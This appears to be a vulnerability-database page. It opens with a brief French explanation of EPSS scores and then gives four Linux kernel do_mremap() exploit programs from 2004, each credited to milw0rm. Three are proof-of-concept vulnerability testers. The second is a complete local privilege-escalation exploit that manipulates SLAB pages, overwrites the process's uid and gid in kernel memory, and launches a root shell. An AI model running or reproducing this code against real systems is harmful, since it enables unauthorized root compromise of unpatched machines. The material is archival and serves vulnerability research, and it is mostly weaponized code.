Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* * Proof-of-concept exploit code for do_mremap() #2 * * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1". * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/ * * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define VMA_SIZE 0x00003000 int main( void ) { int i, ret; void *base0; void *base1; i = 0; while( 1 ) { i++; ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ), VMA_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); if( ret == -1 ) { perror( "mmap" ); break; } base0 = base1; base1 = (void *) ret; } printf( "created ~%d VMAs\n", i ); base0 += 0x1000; base1 += 0x1000; printf( "now mremapping 0x%08X at 0x%08X\n", (int) base1, (int) base0 ); real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 ); printf( "kernel may not be vulnerable\n" ); return( 0 ); } // milw0rm.com [2004-02-18]

/* * Linux kernel mremap() bound checking bug exploit. * * Bug found by Paul Starzetz <paul isec pl> * * Copyright (c) 2004 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <syscall.h> #include <signal.h> #include <time.h> #include <sched.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/wait.h> #include <asm/page.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define str(s) #s #define xstr(s) str(s) #define DSIGNAL SIGCHLD #define CLONEFL (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK) #define PAGEADDR 0x2000 #define RNDINT 512 #define NUMVMA (3 * 5 * 257) #define NUMFORK (17 * 65537) #define DUPTO 1000 #define TMPLEN 256 #define __NR_sys_mremap 163 _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e); unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long new_len, unsigned long flags, unsigned long new_addr); static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid, gid; static volatile int *vma_ro, *vma_rw, *tmp; static volatile unsigned fake_file[16]; void fatal(const char * msg) { printf("\n"); if (!errno) { fprintf(stderr, "FATAL: %s\n", msg); } else { perror(msg); } printf("\nentering endless loop"); fflush(stdout); fflush(stderr); while (1) pause(); } void kernel_code(void * file, loff_t offset, int origin) { int i, c; int *v; if (!file) goto out; __asm__("movl %%esp, %0" : : "m" (c)); c &= 0xffffe000; v = (void *) c; for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) { if (v[i] == uid && v[i+1] == uid) { i++; v[i++] = 0; v[i++] = 0; v[i++] = 0; } if (v[i] == gid) { v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0; break; } } out: dummy++; } void try_to_exploit(void) { int v = 0; v += fops[0]; v += fake_file[0]; kernel_code(0, 0, v); lseek(DUPTO, 0, SEEK_SET); if (geteuid()) { printf("\nFAILED uid!=0"); fflush(stdout); errno =- ENOSYS; fatal("uid change"); } printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout); kill(ppid, SIGUSR1); setresuid(0, 0, 0); sleep(1); printf("\n\n"); fflush(stdout); execl("/bin/bash", "bash", NULL); fatal("burp"); } void cleanup(int v) { victim[DUPTO] = victim[0]; kill(0, SIGUSR2); } void redirect_filp(int v) { printf("\n[!] parent check race... "); fflush(stdout); if (victim[DUPTO] && victim[0] == victim[DUPTO]) { printf("SUCCESS, cought SLAB page!"); fflush(stdout); victim[DUPTO] = (unsigned) & fake_file; signal(SIGUSR1, &cleanup); kill(pid, SIGUSR1); } else { printf("FAILED!"); } fflush(stdout); } int get_slab_objs(void) { FILE * fp; int c, d, u = 0, a = 0; static char line[TMPLEN], name[TMPLEN]; fp = fopen("/proc/slabinfo", "r"); if (!fp) fatal("fopen"); fgets(name, sizeof(name) - 1, fp); do { c = u = a =- 1; if (!fgets(line, sizeof(line) - 1, fp)) break; c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d); } while (strcmp(name, "size-4096")); fclose(fp); return c == 7 ? a - u : -1; } void unprotect(int v) { int n, c = 1; *victim = 0; printf("\n[+] parent unprotected PTE "); fflush(stdout); dup2(0, 2); while (1) { n = get_slab_objs(); if (n < 0) fatal("read slabinfo"); if (n > 0) { printf("\n depopulate SLAB #%d", c++); blah = 0; kill(hpid, SIGUSR1); while (!blah) pause(); } if (!n) { blah = 0; kill(hpid, SIGUSR1); while (!blah) pause(); dup2(0, DUPTO); break; } } signal(SIGUSR1, &redirect_filp); kill(pid, SIGUSR1); } void cleanup_vmas(void) { int i = NUMVMA; while (1) { tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0); if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) { printf("\n[-] ERROR unmapping %d", i); fflush(stdout); fatal("unmap1"); } i--; if (!i) break; tmp = mmap((void *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (tmp != (void *) (PAGEADDR - PAGE_SIZE)) { printf("\n[-] ERROR unmapping %d", i); fflush(stdout); fatal("unmap2"); } i--; if (!i) break; } } void catchme(int v) { blah++; } void exitme(int v) { _exit(0); } void childrip(int v) { waitpid(-1, 0, WNOHANG); } void slab_helper(void) { signal(SIGUSR1, &catchme); signal(SIGUSR2, &exitme); blah = 0; while (1) { while (!blah) pause(); blah = 0; if (!fork()) { dup2(0, DUPTO); kill(getppid(), SIGUSR1); while (1) pause(); } else { while (!blah) pause(); blah = 0; kill(ppid, SIGUSR2); } } exit(0); } int main(void) { int i, r, v, cnt; time_t start; srand(time(NULL) + getpid()); ppid = getpid(); uid = getuid(); gid = getgid(); hpid = fork(); if (!hpid) slab_helper(); fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (fops == MAP_FAILED) fatal("mmap fops VMA"); for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++) fops[i] = (unsigned)&kernel_code; for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++) fake_file[i] = (unsigned)fops; vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (vma_ro == MAP_FAILED) fatal("mmap1"); vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (vma_rw == MAP_FAILED) fatal("mmap2"); cnt = NUMVMA; while (1) { r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR); if (r == (-1)) { printf("\n[-] ERROR remapping"); fflush(stdout); fatal("remap1"); } cnt--; if (!cnt) break; r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR); if (r == (-1)) { printf("\n[-] ERROR remapping"); fflush(stdout); fatal("remap2"); } cnt--; if (!cnt) break; } victim = mmap((void*)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0); if (victim != (void *) PAGEADDR) fatal("mmap victim VMA"); v = *victim; *victim = v + 1; signal(SIGUSR1, &unprotect); signal(SIGUSR2, &catchme); signal(SIGCHLD, &childrip); printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout); start = time(NULL); cnt = NUMFORK; v = 0; while (1) { cnt--; v--; dummy += *victim; if (cnt > 1) { __asm__( "pusha \n" "movl %1, %%eax \n" "movl $("xstr(CLONEFL)"), %%ebx \n" "movl %%esp, %%ecx \n" "movl $120, %%eax \n" "int $0x80 \n" "movl %%eax, %0 \n" "popa \n" : : "m" (pid), "m" (dummy) ); } else { pid = fork(); } if (pid) { if (v <= 0 && cnt > 0) { float eta, tm; v = rand() % RNDINT / 2 + RNDINT / 2; tm = eta = (float)(time(NULL) - start); eta *= (float)NUMFORK; eta /= (float)(NUMFORK - cnt); printf("\r\t%u of %u [ %u %% ETA %6.1f s ] ", NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm); fflush(stdout); } if (cnt) { waitpid(pid, 0, 0); continue; } if (!cnt) { while (1) { r = wait(NULL); if (r == pid) { cleanup_vmas(); while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); } } } } } else { cleanup_vmas(); if (cnt > 0) { _exit(0); } printf("\n[+] overflow done, the moment of truth..."); fflush(stdout); sleep(1); signal(SIGUSR1, &catchme); munmap(0, PAGE_SIZE); dup2(0, 2); blah = 0; kill(ppid, SIGUSR1); while (!blah) pause(); munmap((void *)victim, PAGE_SIZE); dup2(0, DUPTO); blah = 0; kill(ppid, SIGUSR1); while (!blah) pause(); try_to_exploit(); while (1) pause(); } } return 0; } // milw0rm.com [2004-01-15]

/* * EDB Note: This will just "test" the vulnerability. * EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* * Proof-of-concept exploit code for do_mremap() * * Copyright (C) 2004 Christophe Devine and Julien Tinnes * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ #include <asm/unistd.h> #include <sys/mman.h> #include <unistd.h> #include <errno.h> #define MREMAP_MAYMOVE 1 #define MREMAP_FIXED 2 #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); int main( void ) { void *base; base = mmap( NULL, 8192, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 ); real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *) 0xC0000000 ); fork(); return( 0 ); } // milw0rm.com [2004-01-06]

/* * EDB Note: This will just "test" the vulnerability. * EDB Note: An exploit version can be found here ~ https://www.exploit-db.com/exploits/145/ */ /* * Proof of concept code for testing do_mremap() Linux kernel bug. * It is based on the code by Christophe Devine and Julien Tinnes * posted on Bugtraq mailing list on 5 Jan 2004 but it's safer since * it avoids any kernel data corruption. * * The following test was done against the Linux kernel 2.6.0. Similar * results were obtained against the kernel 2.4.23 and previous ones. * * buffer@mintaka:~$ gcc -o mremap_bug mremap_bug.c * buffer@mintaka:~$ ./mremap_bug * * Base address : 0x60000000 * * 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug * 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug * 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so * 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so * 40016000-40017000 rw-p 00000000 00:00 0 * 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so * 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so * 40156000-40159000 rw-p 00000000 00:00 0 * 60000000-60002000 rw-p 00000000 00:00 0 * bfffd000-c0000000 rwxp ffffe000 00:00 0 * * Remapping at 0x70000000... * * 08048000-08049000 r-xp 00000000 03:03 2694 /home/buffer/mremap_bug * 08049000-0804a000 rw-p 00000000 03:03 2694 /home/buffer/mremap_bug * 40000000-40015000 r-xp 00000000 03:01 52619 /lib/ld-2.3.2.so * 40015000-40016000 rw-p 00014000 03:01 52619 /lib/ld-2.3.2.so * 40016000-40017000 rw-p 00000000 00:00 0 * 40022000-40151000 r-xp 00000000 03:01 52588 /lib/libc-2.3.2.so * 40151000-40156000 rw-p 0012f000 03:01 52588 /lib/libc-2.3.2.so * 40156000-40159000 rw-p 00000000 00:00 0 * 60000000-60002000 rw-p 00000000 00:00 0 * 70000000-70000000 rw-p 00000000 00:00 0 * bfffd000-c0000000 rwxp ffffe000 00:00 0 * * Report : * This kernel appears to be VULNERABLE * * Segmentation fault * buffer@mintaka:~$ */ #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/mman.h> #include <sys/stat.h> #include <asm/unistd.h> #include <errno.h> #define MREMAP_FIXED 2 #define PAGESIZE 4096 #define VMASIZE (2*PAGESIZE) #define BUFSIZE 8192 #define __NR_real_mremap __NR_mremap static inline _syscall5( void *, real_mremap, void *, old_address, size_t, old_size, size_t, new_size, unsigned long, flags, void *, new_address ); #define MAPS_NO_CHECK 0 #define MAPS_CHECK 1 int mremap_check = 0; void maps_check(char *buf) { if (strstr(buf, "70000000")) mremap_check++; } void read_maps(int fd, char *path, unsigned long flag) { ssize_t nbytes; char buf[BUFSIZE]; if (lseek(fd, 0, SEEK_SET) < 0) { fprintf(stderr, "Unable to lseek %s\n", path); return; } while ( (nbytes = read(fd, buf, BUFSIZE)) > 0) { if (flag & MAPS_CHECK) maps_check(buf); if (write(STDOUT_FILENO, buf, nbytes) != nbytes) { fprintf(stderr, "Unable to read %s\n", path); exit (1); } } } int main(int argc, char **argv) { void *base; char path[16]; pid_t pid; int fd; pid = getpid(); sprintf(path, "/proc/%d/maps", pid); if ( !(fd = open(path, O_RDONLY))) { fprintf(stderr, "Unable to open %s\n", path); return 1; } base = mmap((void *)0x60000000, VMASIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0); printf("\nBase address : 0x%x\n\n", base); read_maps(fd, path, MAPS_NO_CHECK); printf("\nRemapping at 0x70000000...\n\n"); base = real_mremap(base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED, (void *)0x70000000); read_maps(fd, path, MAPS_CHECK); printf("\nReport : \n"); (mremap_check) ? printf("This kernel appears to be VULNERABLE\n\n") : printf("This kernel appears to be NOT VULNERABLE\n\n"); close(fd); return 0; } // milw0rm.com [2004-01-07]